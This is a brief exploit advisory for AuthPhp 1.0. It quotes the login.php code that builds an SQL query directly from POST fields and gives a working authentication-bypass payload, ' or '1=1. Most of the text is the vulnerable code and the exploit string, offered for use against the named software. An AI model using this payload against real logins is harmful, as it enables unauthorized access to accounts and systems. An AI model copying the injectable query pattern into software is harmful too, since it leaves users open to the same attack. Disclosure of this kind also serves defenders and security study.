AuthPhp version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
6224026d7ec6d0f297316913cddef032150d78e1ea1a399a113b35e4b09432cf
#########################################################################################
[0x01] Informations:
Name : AuthPhp 1.0
Download :
https://frankmancuso.ca/downloads/authphp/authphp-stable-1.0.zip
Vulnerability : Auth Bypass
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/login.php
[Code]
{
$username = $_POST['username'];
$passwd = $_POST['passwd'];
// Call mysql class
$db = new db;
$db->connect();
$sql = "SELECT * FROM users WHERE username='$username' &&
password='$passwd' ";
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: ' or '1=1
########################################################################################